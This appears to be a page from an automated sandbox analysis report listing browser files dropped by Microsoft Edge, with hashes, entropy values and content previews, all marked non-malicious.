                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"continuous_migration":{"local_guid":"e826bae4-6872-4f07-bd22-d5abb804e7f0"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\6b39d52c-e573-48a1-96f1-441f8eebdac8.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                          MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                          SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                          SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                          SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                          MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                          SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                          SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                          SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6763DD3F-C0C.pma

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.047604523646431356
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:93k0m5tmrnOAUJYKJL7qiRDs0JVFg8XGXILhkHsBzhEhNnjvjRQ8TfRfEan8y08s:Bk0UtEsR6uHhc1FvxEa08T2RGOD
                                                                                                                                                                                                                                                                                          MD5:FA99060CCBCFF40C940EC28BDA85BF42
                                                                                                                                                                                                                                                                                          SHA1:A534194B27E63AC4044C2DE7E704E1A0D2429E4F
                                                                                                                                                                                                                                                                                          SHA-256:1533D80535ECD287095AD28D150BE5453802FC7E1E87D357E2C192EA351451FC
                                                                                                                                                                                                                                                                                          SHA-512:ED7562BBFBBCC7F92E6F4AFA0406EB7D3DD3015042CF0DA720340C58267D30BC79879D57BE690EC692B82A8554A3D011446E01CBD80A4A9A270CABEFC0FFA0BC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@................k...Z..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ryepmt20,1(.0..8..B.......2.:.M....U....e...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U..G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2..........

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6763DD40-A58.pma

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4465688791862868
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:IxHd6LU/J6s0W0Mt2ub1wPkcV/E+5VlDdNjW38/5FrqumTXIg1HF2VPh:Kd6Kjt2uUkcVcW7y38/LqumTXIaHwBh
                                                                                                                                                                                                                                                                                          MD5:A4C6E5FDCF76D6018D4CEED39314044A
                                                                                                                                                                                                                                                                                          SHA1:84F12ABFC89E2964D53F90B84E5CE6A80A017B5D
                                                                                                                                                                                                                                                                                          SHA-256:771D627C0EC455C99A8D5F1E3D751FEF9C98D94CC674937E071953B5F490B294
                                                                                                                                                                                                                                                                                          SHA-512:C04FC65B92CEB5BD284FB7CB8B33E994C817BDD709A2F22B15CDD127EEC933F24BAF472511D6CCAE0FB3FA21AEB145939056E6B8858E4CFCAA910590E5923EFE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@............... ...................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".ryepmt20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@...............................0...w..U?:K...G...W6.>.........."....."...24.."."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z....l....'@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. ...2......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.16517681506792
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlrPYjpVjP9M4UcLH3RvwAH/llwBVP/Sh/Jzv/jSIHmsdJEU9VUn5lt:o1rPWVjWZq3RvtNlwBVsJDL7b/3U7
                                                                                                                                                                                                                                                                                          MD5:C847567DEE0317368C1EC824DE025887
                                                                                                                                                                                                                                                                                          SHA1:554098F22FEA9282FE1AAB35560849CD6FF546B1
                                                                                                                                                                                                                                                                                          SHA-256:3CF2B1CBE4F4CCFC640BCF581FD4D9FC84254D2B3839C96EA4909B61AAF28932
                                                                                                                                                                                                                                                                                          SHA-512:A976744405F6ABEBFB7513A3A6A776680334BB94A9E52AEEFE2B05259BCB3CF9781B1CCDA3655D8AA4C1E923143168F29EF3208F81ABCB93AFF5215ED3798219
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:sdPC.....................!...W.F....+F."xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................8889edf7-b09d-4a45-9ea5-adabbfd01bb9............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0dcff9e2-8154-437b-9659-7ae696096fea.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17213), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17213
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.488980895156388
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAJ99QTryDiuabatSuypUsyByyaNPxj1chkPNPJArnIFC3OQ9vd1LOK8TbV+Flp:stAPGQSu4UsyQtJxncOo7CbGZQwMK
                                                                                                                                                                                                                                                                                          MD5:45DDEDC1DF9C22E6405238C2D144678E
                                                                                                                                                                                                                                                                                          SHA1:C128A9DD50AAC16CE7CDCD8251F7372611FE8C90
                                                                                                                                                                                                                                                                                          SHA-256:146318C42B7B49920199B0E9AB40F3C4D5683064CE9E6D1B08369B48D5A5D610
                                                                                                                                                                                                                                                                                          SHA-512:5A58AAFD14DB84346ACED8D312DF5A81ED719FAF94C7A7B5D51C3E0AC422F75149847129CB601C5D3B1CC350040EF469352977080CE21813F8EFCA11ACB8F4FB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1a16d601-d586-4406-b684-bfe788f8b8c2.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17563), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17563
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.484239907249281
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAJ99QTryDiuabatSuypUsyByyaNPxj1chkPNPJArnIFC3OQ9vd1Li78dK8TbV9:stAPGQSu4UsyQtJxncOo70kbGZQw8rf
                                                                                                                                                                                                                                                                                          MD5:9BCA039A4BF68103EA9D51ED7D8C3A58
                                                                                                                                                                                                                                                                                          SHA1:D76A9B50E3EF406425A10FF6CC39AD68975C415B
                                                                                                                                                                                                                                                                                          SHA-256:FF13E023E604A6EA9928330551CBC7B94FC48EE642D5F96E0FD0CB5638DC3364
                                                                                                                                                                                                                                                                                          SHA-512:25AF5CA539C96E0AD9D89A10269C9501CAA5298E9664E4D22217BA50857D223B87A7E49FA776B0A38478051108F0A4125B4362F87D971797CE982DFB6020E232
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\22134674-cc1d-4e3b-b96c-f1094c613ad7.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17398), with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):17398
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4874446964811705
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:stAJ99QTryDiuabatSuypUsyByyaNPxj1chkPNPJArnIFC3OQ9vd1Li78dK8TbVU:stAPGQSu4UsyQtJxncOo70kbGZQw8K
                                                                                                                                                                                                                                                                                          MD5:FC591EA658A55E114FC4CB6DF5F31D3F
                                                                                                                                                                                                                                                                                          SHA1:588527AF70074892B7AF3F478CFF47A741595AF9
                                                                                                                                                                                                                                                                                          SHA-256:DC46FC149421B4E3A452C9B92E993501E41AA7437810396D75A9266CF5C11FFF
                                                                                                                                                                                                                                                                                          SHA-512:66E468A429B94C4B7241B161BBC48D775B67A5E314FF6D109F2781AC63A6B059911999AF917799C7186860029268BB6A79C923855A632AFC43BAF9F56FA65AD7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379071553255015","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\48e259dc-34bd-455e-8da3-760acf99f0ae.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\7e98306e-e524-4464-a989-0938d35c0980.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):25012
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.567639435794489
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:i6bUhjWPLLfXq8F1+UoAYDCx9Tuqh0VfUC9xbog/OVaLTPVrw7pOtuR:i6bUhjWPLLfXqu1jabvPeAtG
                                                                                                                                                                                                                                                                                          MD5:5DD00C3354A01EC760C751D472E5B7E8
                                                                                                                                                                                                                                                                                          SHA1:F8DA696FA400BAEAE0199280A3745FC064C5828C
                                                                                                                                                                                                                                                                                          SHA-256:8B7E9CC909178CC1AB72AD4C5CA8B72EB11081682750CC16CB76126BB0403D99
                                                                                                                                                                                                                                                                                          SHA-512:B027DA16B57278567DA8E0DE90BE0385803A2ACD0B0039DE7AA8A6FB325B9774FECF1AE6E39F8DC39B86DC625D8740397557DD1CB9D75E1F567BB6E9E90891B9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379071552709354","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379071552709354","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8ee10d7c-e4c0-48f7-b416-51165d30a836.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40504
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.561429291541622
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:i71UkF7pLGLh1jWPLLfWq8F1+UoAYDCx9Tuqh0VfUC9xbog/OVIckLTwVrw7jQox:i71UkTch1jWPLLfWqu1japckvwe7jngC
                                                                                                                                                                                                                                                                                          MD5:1B97428CEAFC5210447531AECC3790B2
                                                                                                                                                                                                                                                                                          SHA1:634633E5B7B0025BBD79596D958FC7CEE343DFC6
                                                                                                                                                                                                                                                                                          SHA-256:8CC328BC915FCEF673D50D13839F66F40B0F8FD2A234D70A355F9F795B57FD8C
                                                                                                                                                                                                                                                                                          SHA-512:BEA3C8699273C44D5F2ADBD1A65ECEAB76D63D2807725AA6BDAA234B2BD4D6C35CC0961463A201BD165ED40186E76A4449D686C11C488E2D568102BB0AFEF6A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379071552709354","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379071552709354","location":5,"ma

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                          Encrypted:false
